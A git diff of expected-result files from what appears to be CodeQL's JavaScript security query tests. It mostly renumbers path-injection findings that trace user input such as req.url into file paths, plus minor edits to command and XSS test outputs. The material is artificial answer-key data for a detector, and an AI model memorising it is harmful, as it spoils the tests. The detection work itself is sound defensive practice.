| req.url | TaintedPath.js:65:31:65:76 | require ... ).query | This path depends on a $@. | TaintedPath.js:65:63:65:69 | req.url | user-provided value | -| TaintedPath.js:66:31:66:74 | require ... ).query | TaintedPath.js:66:61:66:67 | req.url | TaintedPath.js:66:31:66:74 | require ... ).query | This path depends on a $@. | TaintedPath.js:66:61:66:67 | req.url | user-provided value | -| TaintedPath.js:67:31:67:73 | require ... ).query | TaintedPath.js:67:60:67:66 | req.url | TaintedPath.js:67:31:67:73 | require ... ).query | This path depends on a $@. | TaintedPath.js:67:60:67:66 | req.url | user-provided value | -| TaintedPath.js:75:48:75:60 | req.params[0] | TaintedPath.js:75:48:75:60 | req.params[0] | TaintedPath.js:75:48:75:60 | req.params[0] | This path depends on a $@. | TaintedPath.js:75:48:75:60 | req.params[0] | user-provided value | -| TaintedPath.js:86:28:86:48 | fs.real ... c(path) | TaintedPath.js:84:23:84:29 | req.url | TaintedPath.js:86:28:86:48 | fs.real ... c(path) | This path depends on a $@. | TaintedPath.js:84:23:84:29 | req.url | user-provided value | -| TaintedPath.js:89:45:89:52 | realpath | TaintedPath.js:84:23:84:29 | req.url | TaintedPath.js:89:45:89:52 | realpath | This path depends on a $@. | TaintedPath.js:84:23:84:29 | req.url | user-provided value | -| TaintedPath.js:122:23:122:26 | path | TaintedPath.js:120:23:120:29 | req.url | TaintedPath.js:122:23:122:26 | path | This path depends on a $@. | TaintedPath.js:120:23:120:29 | req.url | user-provided value | -| TaintedPath.js:128:19:128:22 | path | TaintedPath.js:126:24:126:30 | req.url | TaintedPath.js:128:19:128:22 | path | This path depends on a $@. | TaintedPath.js:126:24:126:30 | req.url | user-provided value | -| TaintedPath.js:132:19:132:33 | split.join("/") | TaintedPath.js:126:24:126:30 | req.url | TaintedPath.js:132:19:132:33 | split.join("/") | This path depends on a $@. | TaintedPath.js:126:24:126:30 | req.url | user-provided value | -| TaintedPath.js:136:19:136:26 | split[x] | TaintedPath.js:126:24:126:30 | req.url | TaintedPath.js:136:19:136:26 | split[x] | This path depends on a $@. | TaintedPath.js:126:24:126:30 | req.url | user-provided value | -| TaintedPath.js:137:19:137:35 | prefix + split[x] | TaintedPath.js:126:24:126:30 | req.url | TaintedPath.js:137:19:137:35 | prefix + split[x] | This path depends on a $@. | TaintedPath.js:126:24:126:30 | req.url | user-provided value | -| TaintedPath.js:140:19:140:37 | concatted.join("/") | TaintedPath.js:126:24:126:30 | req.url | TaintedPath.js:140:19:140:37 | concatted.join("/") | This path depends on a $@. | TaintedPath.js:126:24:126:30 | req.url | user-provided value | -| TaintedPath.js:143:19:143:38 | concatted2.join("/") | TaintedPath.js:126:24:126:30 | req.url | TaintedPath.js:143:19:143:38 | concatted2.join("/") | This path depends on a $@. | TaintedPath.js:126:24:126:30 | req.url | user-provided value | -| TaintedPath.js:145:19:145:29 | split.pop() | TaintedPath.js:126:24:126:30 | req.url | TaintedPath.js:145:19:145:29 | split.pop() | This path depends on a $@. | TaintedPath.js:126:24:126:30 | req.url | user-provided value | -| TaintedPath.js:154:29:154:55 | path.re ... /g, '') | TaintedPath.js:150:24:150:30 | req.url | TaintedPath.js:154:29:154:55 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:150:24:150:30 | req.url | user-provided value | -| TaintedPath.js:160:29:160:52 | path.re ... /g, '') | TaintedPath.js:150:24:150:30 | req.url | TaintedPath.js:160:29:160:52 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:150:24:150:30 | req.url | user-provided value | -| TaintedPath.js:161:29:161:53 | path.re ... /g, '') | TaintedPath.js:150:24:150:30 | req.url | TaintedPath.js:161:29:161:53 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:150:24:150:30 | req.url | user-provided value | -| TaintedPath.js:162:29:162:51 | path.re ... /g, '') | TaintedPath.js:150:24:150:30 | req.url | TaintedPath.js:162:29:162:51 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:150:24:150:30 | req.url | user-provided value | -| TaintedPath.js:163:29:163:57 | path.re ... /g, '') | TaintedPath.js:150:24:150:30 | req.url | TaintedPath.js:163:29:163:57 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:150:24:150:30 | req.url | user-provided value | -| TaintedPath.js:178:29:178:73 | "prefix ... +/, '') | TaintedPath.js:150:24:150:30 | req.url | TaintedPath.js:178:29:178:73 | "prefix ... +/, '') | This path depends on a $@. | TaintedPath.js:150:24:150:30 | req.url | user-provided value | -| TaintedPath.js:179:29:179:84 | pathMod ... +/, '') | TaintedPath.js:150:24:150:30 | req.url | TaintedPath.js:179:29:179:84 | pathMod ... +/, '') | This path depends on a $@. | TaintedPath.js:150:24:150:30 | req.url | user-provided value | -| TaintedPath.js:187:29:187:49 | qs.pars ... rl).foo | TaintedPath.js:187:38:187:44 | req.url | TaintedPath.js:187:29:187:49 | qs.pars ... rl).foo | This path depends on a $@. | TaintedPath.js:187:38:187:44 | req.url | user-provided value | -| TaintedPath.js:188:29:188:63 | qs.pars ... l)).foo | TaintedPath.js:188:51:188:57 | req.url | TaintedPath.js:188:29:188:63 | qs.pars ... l)).foo | This path depends on a $@. | TaintedPath.js:188:51:188:57 | req.url | user-provided value | -| TaintedPath.js:190:29:190:55 | parseqs ... rl).foo | TaintedPath.js:190:44:190:50 | req.url | TaintedPath.js:190:29:190:55 | parseqs ... rl).foo | This path depends on a $@. | TaintedPath.js:190:44:190:50 | req.url | user-provided value | -| TaintedPath.js:196:31:196:34 | path | TaintedPath.js:195:24:195:30 | req.url | TaintedPath.js:196:31:196:34 | path | This path depends on a $@. | TaintedPath.js:195:24:195:30 | req.url | user-provided value | -| TaintedPath.js:197:45:197:48 | path | TaintedPath.js:195:24:195:30 | req.url | TaintedPath.js:197:45:197:48 | path | This path depends on a $@. | TaintedPath.js:195:24:195:30 | req.url | user-provided value | -| TaintedPath.js:198:35:198:38 | path | TaintedPath.js:195:24:195:30 | req.url | TaintedPath.js:198:35:198:38 | path | This path depends on a $@. | TaintedPath.js:195:24:195:30 | req.url | user-provided value | -| TaintedPath.js:206:29:206:85 | path.re ... '), '') | TaintedPath.js:202:24:202:30 | req.url | TaintedPath.js:206:29:206:85 | path.re ... '), '') | This path depends on a $@. | TaintedPath.js:202:24:202:30 | req.url | user-provided value | -| TaintedPath.js:213:29:213:68 | path.re ... '), '') | TaintedPath.js:211:24:211:30 | req.url | TaintedPath.js:213:29:213:68 | path.re ... '), '') | This path depends on a $@. | TaintedPath.js:211:24:211:30 | req.url | user-provided value | -| TaintedPath.js:216:31:216:69 | path.re ... '), '') | TaintedPath.js:211:24:211:30 | req.url | TaintedPath.js:216:31:216:69 | path.re ... '), '') | This path depends on a $@. | TaintedPath.js:211:24:211:30 | req.url | user-provided value | -| examples/TaintedPath.js:11:29:11:43 | ROOT + filePath | examples/TaintedPath.js:8:28:8:34 | req.url | examples/TaintedPath.js:11:29:11:43 | ROOT + filePath | This path depends on a $@. | examples/TaintedPath.js:8:28:8:34 | req.url | user-provided value | +| TaintedPath-es6.js:9:26:9:45 | join("public", path) | TaintedPath-es6.js:7:20:7:26 | req.url | TaintedPath-es6.js:9:26:9:45 | join("public", path) | This path depends on a $@. | TaintedPath-es6.js:7:20:7:26 | req.url | user-provided value | +| TaintedPath.js:11:29:11:32 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:11:29:11:32 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | +| TaintedPath.js:13:29:13:48 | "/home/user/" + path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:13:29:13:48 | "/home/user/" + path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | +| TaintedPath.js:16:33:16:36 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:16:33:16:36 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | +| TaintedPath.js:19:33:19:36 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:19:33:19:36 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | +| TaintedPath.js:22:33:22:36 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:22:33:22:36 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | +| TaintedPath.js:31:31:31:34 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:31:31:31:34 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | +| TaintedPath.js:39:29:39:52 | pathMod ... e(path) | TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:39:29:39:52 | pathMod ... e(path) | This path depends on a $@. | TaintedPath.js:36:20:36:26 | req.url | user-provided value | +| TaintedPath.js:42:29:42:49 | pathMod ... n(path) | TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:42:29:42:49 | pathMod ... n(path) | This path depends on a $@. | TaintedPath.js:36:20:36:26 | req.url | user-provided value | +| TaintedPath.js:43:29:43:58 | pathMod ... ath, z) | TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:43:29:43:58 | pathMod ... ath, z) | This path depends on a $@. | TaintedPath.js:36:20:36:26 | req.url | user-provided value | +| TaintedPath.js:44:29:44:54 | pathMod ... e(path) | TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:44:29:44:54 | pathMod ... e(path) | This path depends on a $@. | TaintedPath.js:36:20:36:26 | req.url | user-provided value | +| TaintedPath.js:45:29:45:56 | pathMod ... , path) | TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:45:29:45:56 | pathMod ... , path) | This path depends on a $@. | TaintedPath.js:36:20:36:26 | req.url | user-provided value | +| TaintedPath.js:46:29:46:56 | pathMod ... ath, x) | TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:46:29:46:56 | pathMod ... ath, x) | This path depends on a $@. | TaintedPath.js:36:20:36:26 | req.url | user-provided value | +| TaintedPath.js:47:29:47:52 | pathMod ... e(path) | TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:47:29:47:52 | pathMod ... e(path) | This path depends on a $@. | TaintedPath.js:36:20:36:26 | req.url | user-provided value | +| TaintedPath.js:48:29:48:61 | pathMod ... ath, z) | TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:48:29:48:61 | pathMod ... ath, z) | This path depends on a $@. | TaintedPath.js:36:20:36:26 | req.url | user-provided value | +| TaintedPath.js:49:29:49:61 | pathMod ... h(path) | TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:49:29:49:61 | pathMod ... h(path) | This path depends on a $@. | TaintedPath.js:36:20:36:26 | req.url | user-provided value | +| TaintedPath.js:54:31:54:76 | require ... ).query | TaintedPath.js:54:63:54:69 | req.url | TaintedPath.js:54:31:54:76 | require ... ).query | This path depends on a $@. | TaintedPath.js:54:63:54:69 | req.url | user-provided value | +| TaintedPath.js:55:31:55:74 | require ... ).query | TaintedPath.js:55:61:55:67 | req.url | TaintedPath.js:55:31:55:74 | require ... ).query | This path depends on a $@. | TaintedPath.js:55:61:55:67 | req.url | user-provided value | +| TaintedPath.js:56:31:56:73 | require ... ).query | TaintedPath.js:56:60:56:66 | req.url | TaintedPath.js:56:31:56:73 | require ... ).query | This path depends on a $@. | TaintedPath.js:56:60:56:66 | req.url | user-provided value | +| TaintedPath.js:64:48:64:60 | req.params[0] | TaintedPath.js:64:48:64:60 | req.params[0] | TaintedPath.js:64:48:64:60 | req.params[0] | This path depends on a $@. | TaintedPath.js:64:48:64:60 | req.params[0] | user-provided value | +| TaintedPath.js:75:28:75:48 | fs.real ... c(path) | TaintedPath.js:73:23:73:29 | req.url | TaintedPath.js:75:28:75:48 | fs.real ... c(path) | This path depends on a $@. | TaintedPath.js:73:23:73:29 | req.url | user-provided value | +| TaintedPath.js:78:45:78:52 | realpath | TaintedPath.js:73:23:73:29 | req.url | TaintedPath.js:78:45:78:52 | realpath | This path depends on a $@. | TaintedPath.js:73:23:73:29 | req.url | user-provided value | +| TaintedPath.js:111:23:111:26 | path | TaintedPath.js:109:23:109:29 | req.url | TaintedPath.js:111:23:111:26 | path | This path depends on a $@. | TaintedPath.js:109:23:109:29 | req.url | user-provided value | +| TaintedPath.js:117:19:117:22 | path | TaintedPath.js:115:24:115:30 | req.url | TaintedPath.js:117:19:117:22 | path | This path depends on a $@. | TaintedPath.js:115:24:115:30 | req.url | user-provided value | +| TaintedPath.js:121:19:121:33 | split.join("/") | TaintedPath.js:115:24:115:30 | req.url | TaintedPath.js:121:19:121:33 | split.join("/") | This path depends on a $@. | TaintedPath.js:115:24:115:30 | req.url | user-provided value | +| TaintedPath.js:125:19:125:26 | split[x] | TaintedPath.js:115:24:115:30 | req.url | TaintedPath.js:125:19:125:26 | split[x] | This path depends on a $@. | TaintedPath.js:115:24:115:30 | req.url | user-provided value | +| TaintedPath.js:126:19:126:35 | prefix + split[x] | TaintedPath.js:115:24:115:30 | req.url | TaintedPath.js:126:19:126:35 | prefix + split[x] | This path depends on a $@. | TaintedPath.js:115:24:115:30 | req.url | user-provided value | +| TaintedPath.js:129:19:129:37 | concatted.join("/") | TaintedPath.js:115:24:115:30 | req.url | TaintedPath.js:129:19:129:37 | concatted.join("/") | This path depends on a $@. | TaintedPath.js:115:24:115:30 | req.url | user-provided value | +| TaintedPath.js:132:19:132:38 | concatted2.join("/") | TaintedPath.js:115:24:115:30 | req.url | TaintedPath.js:132:19:132:38 | concatted2.join("/") | This path depends on a $@. | TaintedPath.js:115:24:115:30 | req.url | user-provided value | +| TaintedPath.js:134:19:134:29 | split.pop() | TaintedPath.js:115:24:115:30 | req.url | TaintedPath.js:134:19:134:29 | split.pop() | This path depends on a $@. | TaintedPath.js:115:24:115:30 | req.url | user-provided value | +| TaintedPath.js:143:29:143:55 | path.re ... /g, '') | TaintedPath.js:139:24:139:30 | req.url | TaintedPath.js:143:29:143:55 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:139:24:139:30 | req.url | user-provided value | +| TaintedPath.js:149:29:149:52 | path.re ... /g, '') | TaintedPath.js:139:24:139:30 | req.url | TaintedPath.js:149:29:149:52 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:139:24:139:30 | req.url | user-provided value | +| TaintedPath.js:150:29:150:53 | path.re ... /g, '') | TaintedPath.js:139:24:139:30 | req.url | TaintedPath.js:150:29:150:53 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:139:24:139:30 | req.url | user-provided value | +| TaintedPath.js:151:29:151:51 | path.re ... /g, '') | TaintedPath.js:139:24:139:30 | req.url | TaintedPath.js:151:29:151:51 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:139:24:139:30 | req.url | user-provided value | +| TaintedPath.js:152:29:152:57 | path.re ... /g, '') | TaintedPath.js:139:24:139:30 | req.url | TaintedPath.js:152:29:152:57 | path.re ... /g, '') | This path depends on a $@. | TaintedPath.js:139:24:139:30 | req.url | user-provided value | +| TaintedPath.js:167:29:167:73 | "prefix ... +/, '') | TaintedPath.js:139:24:139:30 | req.url | TaintedPath.js:167:29:167:73 | "prefix ... +/, '') | This path depends on a $@. | TaintedPath.js:139:24:139:30 | req.url | user-provided value | +| TaintedPath.js:168:29:168:84 | pathMod ... +/, '') | TaintedPath.js:139:24:139:30 | req.url | TaintedPath.js:168:29:168:84 | pathMod ... +/, '') | This path depends on a $@. | TaintedPath.js:139:24:139:30 | req.url | user-provided value | +| TaintedPath.js:176:29:176:49 | qs.pars ... rl).foo | TaintedPath.js:176:38:176:44 | req.url | TaintedPath.js:176:29:176:49 | qs.pars ... rl).foo | This path depends on a $@. | TaintedPath.js:176:38:176:44 | req.url | user-provided value | +| TaintedPath.js:177:29:177:63 | qs.pars ... l)).foo | TaintedPath.js:177:51:177:57 | req.url | TaintedPath.js:177:29:177:63 | qs.pars ... l)).foo | This path depends on a $@. | TaintedPath.js:177:51:177:57 | req.url | user-provided value | +| TaintedPath.js:179:29:179:55 | parseqs ... rl).foo | TaintedPath.js:179:44:179:50 | req.url | TaintedPath.js:179:29:179:55 | parseqs ... rl).foo | This path depends on a $@. | TaintedPath.js:179:44:179:50 | req.url | user-provided value | +| TaintedPath.js:185:31:185:34 | path | TaintedPath.js:184:24:184:30 | req.url | TaintedPath.js:185:31:185:34 | path | This path depends on a $@. | TaintedPath.js:184:24:184:30 | req.url | user-provided value | +| TaintedPath.js:186:45:186:48 | path | TaintedPath.js:184:24:184:30 | req.url | TaintedPath.js:186:45:186:48 | path | This path depends on a $@. | TaintedPath.js:184:24:184:30 | req.url | user-provided value | +| TaintedPath.js:187:35:187:38 | path | TaintedPath.js:184:24:184:30 | req.url | TaintedPath.js:187:35:187:38 | path | This path depends on a $@. | TaintedPath.js:184:24:184:30 | req.url | user-provided value | +| TaintedPath.js:195:29:195:85 | path.re ... '), '') | TaintedPath.js:191:24:191:30 | req.url | TaintedPath.js:195:29:195:85 | path.re ... '), '') | This path depends on a $@. | TaintedPath.js:191:24:191:30 | req.url | user-provided value | +| TaintedPath.js:202:29:202:68 | path.re ... '), '') | TaintedPath.js:200:24:200:30 | req.url | TaintedPath.js:202:29:202:68 | path.re ... '), '') | This path depends on a $@. | TaintedPath.js:200:24:200:30 | req.url | user-provided value | +| TaintedPath.js:205:31:205:69 | path.re ... '), '') | TaintedPath.js:200:24:200:30 | req.url | TaintedPath.js:205:31:205:69 | path.re ... '), '') | This path depends on a $@. | TaintedPath.js:200:24:200:30 | req.url | user-provided value | +| examples/TaintedPath.js:10:29:10:43 | ROOT + filePath | examples/TaintedPath.js:8:28:8:34 | req.url | examples/TaintedPath.js:10:29:10:43 | ROOT + filePath | This path depends on a $@. | examples/TaintedPath.js:8:28:8:34 | req.url | user-provided value | | express.js:8:20:8:32 | req.query.bar | express.js:8:20:8:32 | req.query.bar | express.js:8:20:8:32 | req.query.bar | This path depends on a $@. | express.js:8:20:8:32 | req.query.bar | user-provided value | | handlebars.js:11:32:11:39 | filePath | handlebars.js:29:46:29:60 | req.params.path | handlebars.js:11:32:11:39 | filePath | This path depends on a $@. | handlebars.js:29:46:29:60 | req.params.path | user-provided value | | handlebars.js:15:25:15:32 | filePath | handlebars.js:43:15:43:29 | req.params.path | handlebars.js:15:25:15:32 | filePath | This path depends on a $@. | handlebars.js:43:15:43:29 | req.params.path | user-provided value | @@ -1114,18 +1114,18 @@ subpaths | tainted-access-paths.js:49:10:49:13 | path | tainted-access-paths.js:48:24:48:30 | req.url | tainted-access-paths.js:49:10:49:13 | path | This path depends on a $@. | tainted-access-paths.js:48:24:48:30 | req.url | user-provided value | | tainted-promise-steps.js:11:19:11:35 | await pathPromise | tainted-promise-steps.js:6:24:6:30 | req.url | tainted-promise-steps.js:11:19:11:35 | await pathPromise | This path depends on a $@. | tainted-promise-steps.js:6:24:6:30 | req.url | user-provided value | | tainted-promise-steps.js:12:44:12:47 | path | tainted-promise-steps.js:6:24:6:30 | req.url | tainted-promise-steps.js:12:44:12:47 | path | This path depends on a $@. | tainted-promise-steps.js:6:24:6:30 | req.url | user-provided value | -| tainted-require.js:7:19:7:37 | req.param("module") | tainted-require.js:7:19:7:37 | req.param("module") | tainted-require.js:7:19:7:37 | req.param("module") | This path depends on a $@. | tainted-require.js:7:19:7:37 | req.param("module") | user-provided value | -| tainted-require.js:12:29:12:47 | req.param("module") | tainted-require.js:12:29:12:47 | req.param("module") | tainted-require.js:12:29:12:47 | req.param("module") | This path depends on a $@. | tainted-require.js:12:29:12:47 | req.param("module") | user-provided value | -| tainted-require.js:14:11:14:29 | req.param("module") | tainted-require.js:14:11:14:29 | req.param("module") | tainted-require.js:14:11:14:29 | req.param("module") | This path depends on a $@. | tainted-require.js:14:11:14:29 | req.param("module") | user-provided value | +| tainted-require.js:6:19:6:37 | req.param("module") | tainted-require.js:6:19:6:37 | req.param("module") | tainted-require.js:6:19:6:37 | req.param("module") | This path depends on a $@. | tainted-require.js:6:19:6:37 | req.param("module") | user-provided value | +| tainted-require.js:11:29:11:47 | req.param("module") | tainted-require.js:11:29:11:47 | req.param("module") | tainted-require.js:11:29:11:47 | req.param("module") | This path depends on a $@. | tainted-require.js:11:29:11:47 | req.param("module") | user-provided value | +| tainted-require.js:13:11:13:29 | req.param("module") | tainted-require.js:13:11:13:29 | req.param("module") | tainted-require.js:13:11:13:29 | req.param("module") | This path depends on a $@. | tainted-require.js:13:11:13:29 | req.param("module") | user-provided value | +| tainted-sendFile.js:7:16:7:33 | req.param("gimme") | tainted-sendFile.js:7:16:7:33 | req.param("gimme") | tainted-sendFile.js:7:16:7:33 | req.param("gimme") | This path depends on a $@. | tainted-sendFile.js:7:16:7:33 | req.param("gimme") | user-provided value | | tainted-sendFile.js:8:16:8:33 | req.param("gimme") | tainted-sendFile.js:8:16:8:33 | req.param("gimme") | tainted-sendFile.js:8:16:8:33 | req.param("gimme") | This path depends on a $@. | tainted-sendFile.js:8:16:8:33 | req.param("gimme") | user-provided value | -| tainted-sendFile.js:10:16:10:33 | req.param("gimme") | tainted-sendFile.js:10:16:10:33 | req.param("gimme") | tainted-sendFile.js:10:16:10:33 | req.param("gimme") | This path depends on a $@. | tainted-sendFile.js:10:16:10:33 | req.param("gimme") | user-provided value | -| tainted-sendFile.js:18:43:18:58 | req.param("dir") | tainted-sendFile.js:18:43:18:58 | req.param("dir") | tainted-sendFile.js:18:43:18:58 | req.param("dir") | This path depends on a $@. | tainted-sendFile.js:18:43:18:58 | req.param("dir") | user-provided value | -| tainted-sendFile.js:24:16:24:49 | path.re ... rams.x) | tainted-sendFile.js:24:37:24:48 | req.params.x | tainted-sendFile.js:24:16:24:49 | path.re ... rams.x) | This path depends on a $@. | tainted-sendFile.js:24:37:24:48 | req.params.x | user-provided value | -| tainted-sendFile.js:25:16:25:46 | path.jo ... rams.x) | tainted-sendFile.js:25:34:25:45 | req.params.x | tainted-sendFile.js:25:16:25:46 | path.jo ... rams.x) | This path depends on a $@. | tainted-sendFile.js:25:34:25:45 | req.params.x | user-provided value | -| tainted-sendFile.js:30:16:30:33 | req.param("gimme") | tainted-sendFile.js:30:16:30:33 | req.param("gimme") | tainted-sendFile.js:30:16:30:33 | req.param("gimme") | This path depends on a $@. | tainted-sendFile.js:30:16:30:33 | req.param("gimme") | user-provided value | -| tainted-sendFile.js:33:16:33:48 | homeDir ... arams.x | tainted-sendFile.js:33:37:33:48 | req.params.x | tainted-sendFile.js:33:16:33:48 | homeDir ... arams.x | This path depends on a $@. | tainted-sendFile.js:33:37:33:48 | req.params.x | user-provided value | -| tainted-sendFile.js:35:16:35:46 | path.jo ... rams.x) | tainted-sendFile.js:35:34:35:45 | req.params.x | tainted-sendFile.js:35:16:35:46 | path.jo ... rams.x) | This path depends on a $@. | tainted-sendFile.js:35:34:35:45 | req.params.x | user-provided value | -| tainted-sendFile.js:38:43:38:58 | req.param("dir") | tainted-sendFile.js:38:43:38:58 | req.param("dir") | tainted-sendFile.js:38:43:38:58 | req.param("dir") | This path depends on a $@. | tainted-sendFile.js:38:43:38:58 | req.param("dir") | user-provided value | +| tainted-sendFile.js:15:43:15:58 | req.param("dir") | tainted-sendFile.js:15:43:15:58 | req.param("dir") | tainted-sendFile.js:15:43:15:58 | req.param("dir") | This path depends on a $@. | tainted-sendFile.js:15:43:15:58 | req.param("dir") | user-provided value | +| tainted-sendFile.js:21:16:21:49 | path.re ... rams.x) | tainted-sendFile.js:21:37:21:48 | req.params.x | tainted-sendFile.js:21:16:21:49 | path.re ... rams.x) | This path depends on a $@. | tainted-sendFile.js:21:37:21:48 | req.params.x | user-provided value | +| tainted-sendFile.js:22:16:22:46 | path.jo ... rams.x) | tainted-sendFile.js:22:34:22:45 | req.params.x | tainted-sendFile.js:22:16:22:46 | path.jo ... rams.x) | This path depends on a $@. | tainted-sendFile.js:22:34:22:45 | req.params.x | user-provided value | +| tainted-sendFile.js:27:16:27:33 | req.param("gimme") | tainted-sendFile.js:27:16:27:33 | req.param("gimme") | tainted-sendFile.js:27:16:27:33 | req.param("gimme") | This path depends on a $@. | tainted-sendFile.js:27:16:27:33 | req.param("gimme") | user-provided value | +| tainted-sendFile.js:30:16:30:48 | homeDir ... arams.x | tainted-sendFile.js:30:37:30:48 | req.params.x | tainted-sendFile.js:30:16:30:48 | homeDir ... arams.x | This path depends on a $@. | tainted-sendFile.js:30:37:30:48 | req.params.x | user-provided value | +| tainted-sendFile.js:32:16:32:46 | path.jo ... rams.x) | tainted-sendFile.js:32:34:32:45 | req.params.x | tainted-sendFile.js:32:16:32:46 | path.jo ... rams.x) | This path depends on a $@. | tainted-sendFile.js:32:34:32:45 | req.params.x | user-provided value | +| tainted-sendFile.js:35:43:35:58 | req.param("dir") | tainted-sendFile.js:35:43:35:58 | req.param("dir") | tainted-sendFile.js:35:43:35:58 | req.param("dir") | This path depends on a $@. | tainted-sendFile.js:35:43:35:58 | req.param("dir") | user-provided value | | tainted-string-steps.js:8:18:8:34 | path.substring(4) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:8:18:8:34 | path.substring(4) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | | tainted-string-steps.js:9:18:9:37 | path.substring(0, i) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:9:18:9:37 | path.substring(0, i) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | | tainted-string-steps.js:10:18:10:31 | path.substr(4) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:10:18:10:31 | path.substr(4) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | @@ -1141,8 +1141,8 @@ subpaths | tainted-string-steps.js:26:18:26:45 | path.sp ... hatever | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:26:18:26:45 | path.sp ... hatever | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | | tainted-string-steps.js:27:18:27:36 | path.split(unknown) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:27:18:27:36 | path.split(unknown) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | | torrents.js:7:25:7:27 | loc | torrents.js:5:13:5:38 | parseTo ... t).name | torrents.js:7:25:7:27 | loc | This path depends on a $@. | torrents.js:5:13:5:38 | parseTo ... t).name | user-provided value | -| typescript.ts:12:29:12:32 | path | typescript.ts:9:24:9:30 | req.url | typescript.ts:12:29:12:32 | path | This path depends on a $@. | typescript.ts:9:24:9:30 | req.url | user-provided value | -| typescript.ts:21:39:21:43 | path3 | typescript.ts:9:24:9:30 | req.url | typescript.ts:21:39:21:43 | path3 | This path depends on a $@. | typescript.ts:9:24:9:30 | req.url | user-provided value | -| typescript.ts:24:39:24:43 | path4 | typescript.ts:9:24:9:30 | req.url | typescript.ts:24:39:24:43 | path4 | This path depends on a $@. | typescript.ts:9:24:9:30 | req.url | user-provided value | -| typescript.ts:32:29:32:33 | path6 | typescript.ts:9:24:9:30 | req.url | typescript.ts:32:29:32:33 | path6 | This path depends on a $@. | typescript.ts:9:24:9:30 | req.url | user-provided value | +| typescript.ts:11:29:11:32 | path | typescript.ts:9:24:9:30 | req.url | typescript.ts:11:29:11:32 | path | This path depends on a $@. | typescript.ts:9:24:9:30 | req.url | user-provided value | +| typescript.ts:20:39:20:43 | path3 | typescript.ts:9:24:9:30 | req.url | typescript.ts:20:39:20:43 | path3 | This path depends on a $@. | typescript.ts:9:24:9:30 | req.url | user-provided value | +| typescript.ts:23:39:23:43 | path4 | typescript.ts:9:24:9:30 | req.url | typescript.ts:23:39:23:43 | path4 | This path depends on a $@. | typescript.ts:9:24:9:30 | req.url | user-provided value | +| typescript.ts:31:29:31:33 | path6 | typescript.ts:9:24:9:30 | req.url | typescript.ts:31:29:31:33 | path6 | This path depends on a $@. | typescript.ts:9:24:9:30 | req.url | user-provided value | | views.js:1:43:1:55 | req.params[0] | views.js:1:43:1:55 | req.params[0] | views.js:1:43:1:55 | req.params[0] | This path depends on a $@. | views.js:1:43:1:55 | req.params[0] | user-provided value | diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UselessUseOfCat/UselessUseOfCat.expected b/javascript/ql/test/query-tests/Security/CWE-078/UselessUseOfCat/UselessUseOfCat.expected index 1a561b8fc416..820d8af4767d 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UselessUseOfCat/UselessUseOfCat.expected +++ b/javascript/ql/test/query-tests/Security/CWE-078/UselessUseOfCat/UselessUseOfCat.expected @@ -78,7 +78,7 @@ options | uselesscat.js:86:1:86:75 | execFil ... utf8'}) | uselesscat.js:86:57:86:74 | {encoding: 'utf8'} | | uselesscat.js:100:1:100:56 | execFil ... ptions) | uselesscat.js:100:42:100:55 | unknownOptions | | uselesscat.js:111:1:111:51 | spawn(' ... it'] }) | uselesscat.js:111:14:111:50 | { stdio ... rit'] } | -| uselesscat.js:136:17:138:2 | execSyn ... tf8'\\n}) | uselesscat.js:136:51:138:1 | { // NO ... utf8'\\n} | +| uselesscat.js:136:17:138:2 | execSyn ... tf8'\\n}) | uselesscat.js:136:51:138:1 | { // $ ... utf8'\\n} | | uselesscat.js:147:1:147:47 | shelljs ... utf8'}) | uselesscat.js:147:29:147:46 | {encoding: 'utf8'} | | uselesscat.js:151:1:151:48 | cspawn( ... tf8' }) | uselesscat.js:151:28:151:47 | { encoding: 'utf8' } | | uselesscat.js:156:1:156:35 | cspawn( ... tf8' }) | uselesscat.js:156:15:156:34 | { encoding: 'utf8' } | diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/Xss.expected b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/Xss.expected index eb46033824f4..9b8f27cdc70c 100644 --- 